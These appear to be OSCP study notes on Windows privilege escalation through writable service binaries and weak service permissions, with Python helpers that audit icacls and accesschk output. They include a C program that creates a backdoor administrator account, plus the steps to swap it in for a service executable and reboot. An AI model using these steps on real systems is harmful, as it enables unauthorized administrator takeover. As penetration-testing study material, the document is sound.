OSCP Notes

Insecure File Permissions Priv Esc

Run whoami /priv and check that SeShutdownPrivilege is listed. It will usually show as "Disabled", which only means it is not enabled in the current token; being listed at all means the user is allowed to reboot the machine, which the last step of this technique needs. If it is listed, move on to the next step.
Find all services with "auto" start mode (they start automatically at system start-up), are not installed under C:\Windows, and have an unquoted path:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
For every service binary in that output, check its permissions with the icacls command:
icacls "file_path"
We are looking for an ACE that grants (F) (full control) or (W) (write) on the executable, since either lets the file be replaced.
  • if the wmic output listed more than one path, run the same check on each of them.
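As an added example (not part of these notes), the following Python helper parses the icacls listing for each path the wmic command returned and flags ACEs that grant write-level rights to principals every local user belongs to. It goes a little beyond the notes' (F)/(W) check: M (Modify), D (Delete) and the granular write rights (WD, AD, WDAC, WO) are treated as weak too, because they give the same outcome. The sample path, the sample icacls listing and the principal list are constructed; audit_path only works on a Windows host with icacls available.

```python
"""Audit icacls output for service binaries writable by low-privileged users."""
import re
import subprocess

# Principals that any local user is a member of (assumption: the English
# display names that icacls prints).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# Rights that let the holder replace or alter the file. F and W are the ones
# the notes mention; M, D and the granular write rights lead to the same result.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# One ACE looks like  BUILTIN\Users:(I)(OI)(CI)(F)  or  Everyone:(DE,DC,WDAC)
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_ace(text):
    """Turn 'BUILTIN\\Users:(I)(OI)(CI)(F)' into ('BUILTIN\\Users', {'F'})."""
    m = ACE_RE.match(text.strip())
    if not m:
        return None
    rights = set()
    for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
        for token in group.split(","):
            token = token.strip()
            if token and token not in INHERITANCE_FLAGS:
                rights.add(token)
    return m.group("principal"), rights


def parse_icacls(path, output):
    """Parse the output of `icacls <path>` into a list of (principal, rights).

    icacls prints the path on the first line followed directly by the first
    ACE; the remaining ACEs are indented on the following lines, and a
    'Successfully processed' summary line closes the listing.
    """
    aces = []
    for line in output.splitlines():
        line = line.rstrip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):]
        ace = parse_ace(line)
        if ace:
            aces.append(ace)
    return aces


def weak_aces(path, output):
    """Return [(principal, [weak rights])] for low-privileged principals."""
    findings = []
    for principal, rights in parse_icacls(path, output):
        weak = rights & WRITE_RIGHTS
        if principal.lower() in LOW_PRIV_PRINCIPALS and weak:
            findings.append((principal, sorted(weak)))
    return findings


def audit_path(path):
    """Run icacls on a live Windows host and report weak ACEs for one path."""
    out = subprocess.run(["icacls", path], capture_output=True, text=True).stdout
    return weak_aces(path, out)


# Constructed sample: an icacls listing for a service binary that Users can
# overwrite. The path and the vendor name are made up.
SAMPLE_PATH = r"C:\Program Files\Example Svc\normal.exe"
SAMPLE_ICACLS = (
    r"C:\Program Files\Example Svc\normal.exe BUILTIN\Users:(F)" "\n"
    r"                                        NT AUTHORITY\SYSTEM:(I)(F)" "\n"
    r"                                        BUILTIN\Administrators:(I)(F)" "\n"
    r"                                        BUILTIN\Users:(I)(RX)" "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

if __name__ == "__main__":
    for principal, rights in weak_aces(SAMPLE_PATH, SAMPLE_ICACLS):
        print(f"WEAK: {principal} has {','.join(rights)} on {SAMPLE_PATH}")
```

The parser strips the known path from the first line instead of guessing where the path ends, because both paths and principals (NT AUTHORITY\Authenticated Users) can contain spaces; inherited-only ACEs such as BUILTIN\Users:(I)(RX) are parsed but not reported, since RX does not allow the binary to be replaced.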
Once an executable with writable permissions is found, write a small program that creates a local administrator account.
#include <stdlib.h>

int main()
{
    int i;
    /* create the local account gori with the password goripass */
    i = system("net user gori goripass /add");
    /* add that account to the local Administrators group */
    i = system("net localgroup administrators gori /add");
    return 0;
}
This program adds an account (user: gori, password: goripass) and puts it in the local Administrators group.
Cross-compile it on the local Kali machine:
i686-w64-mingw32-gcc adduser.c -o adduser.exe
Transfer adduser.exe to the victim machine.
Now rename the original service executable so that the compiled program can be put in its place:
move "C:\Program Files\..\..\normal.exe" "C:\Program Files\..\..\originalnormal.exe"
move "C:\Users\victim\Desktop\adduser.exe" "C:\Program Files\..\..\normal.exe"
Here the original file was renamed to originalnormal.exe and adduser.exe was moved into its place as normal.exe
(the move command renames a file as well as moving it).
Check that the service is running:
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Since the service starts automatically, rebooting the machine is enough to make it run the replaced binary and add the new account:
shutdown /r /t 0
Log in as the new user:
rdesktop -u gori -p goripass target_IP
Lastly, confirm that the new user is indeed a local administrator:
net localgroup Administrators
Weak service permission
Detection
# Find all services authenticated users have modify access onto
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# a service listed with SERVICE_ALL_ACCESS is vulnerable
# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
or
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service permissions...
ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart : True
or
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
[+] Modifiable Services(T1007)
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles
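Added example (not from these notes, nor from the accesschk, PowerUp or winPEAS projects): a Python parser for the verbose accesschk service listing produced by the detection command above, reporting the services on which the queried principal holds rights sufficient to reconfigure the service. The notes flag SERVICE_ALL_ACCESS; this goes further and also flags SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER, which lead to the same takeover. The sample listing, the service names other than daclsvc, and the assumed line layout (access indicator and service name at column 0, granted rights indented below) are constructed; audit_services only works on a Windows host with accesschk.exe on the PATH.

```python
"""Triage accesschk service-permission output for takeover-level rights."""
import subprocess

# Rights that let the holder repoint the service binary or rewrite its DACL.
# SERVICE_ALL_ACCESS is what the notes flag; the other three give the same
# result (assumption: treated as equally serious here).
TAKEOVER_RIGHTS = {
    "SERVICE_ALL_ACCESS",
    "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC",
    "WRITE_OWNER",
}


def parse_accesschk_services(output):
    """Map service name -> set of rights from `accesschk -uwcqv <principal> *`.

    Assumed layout: each service starts at column 0 with an access indicator
    (R, W or RW) and the service name; the rights granted follow, one per
    indented line. Banner or error lines at column 0 are ignored.
    """
    services = {}
    current = None
    for raw in output.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace():
            if current is not None:
                services[current].add(raw.strip())
            continue
        parts = raw.split(None, 1)
        if len(parts) == 2 and set(parts[0]) <= {"R", "W"}:
            current = parts[1].strip()
            services[current] = set()
        else:
            current = None  # banner, error text or anything unexpected
    return services


def takeover_candidates(output):
    """Return sorted [(service, [takeover rights])] for the weak services."""
    found = []
    for name, rights in parse_accesschk_services(output).items():
        hit = rights & TAKEOVER_RIGHTS
        if hit:
            found.append((name, sorted(hit)))
    return sorted(found)


def audit_services(principal="Authenticated Users"):
    """Run accesschk on a live Windows host and triage its output."""
    out = subprocess.run(
        ["accesschk.exe", "/accepteula", "-uwcqv", principal, "*"],
        capture_output=True, text=True,
    ).stdout
    return takeover_candidates(out)


# Constructed sample in the assumed accesschk layout: daclsvc (the name used in
# the notes) with full access, a second service with only change-config, and a
# third whose write bit comes from a harmless user-defined control right.
SAMPLE_ACCESSCHK = (
    "RW daclsvc\n"
    "\tSERVICE_ALL_ACCESS\n"
    "RW UpdateHelper\n"
    "\tSERVICE_QUERY_STATUS\n"
    "\tSERVICE_QUERY_CONFIG\n"
    "\tSERVICE_CHANGE_CONFIG\n"
    "\tSERVICE_INTERROGATE\n"
    "\tREAD_CONTROL\n"
    "W  LogWriter\n"
    "\tSERVICE_USER_DEFINED_CONTROL\n"
)

if __name__ == "__main__":
    for name, rights in takeover_candidates(SAMPLE_ACCESSCHK):
        print(f"{name}: {', '.join(rights)}")
```

The point of looking at the individual rights rather than accesschk's W indicator is that a write bit can come from SERVICE_USER_DEFINED_CONTROL alone, which only permits sending control codes; LogWriter is therefore not reported, while UpdateHelper is, even though neither shows SERVICE_ALL_ACCESS.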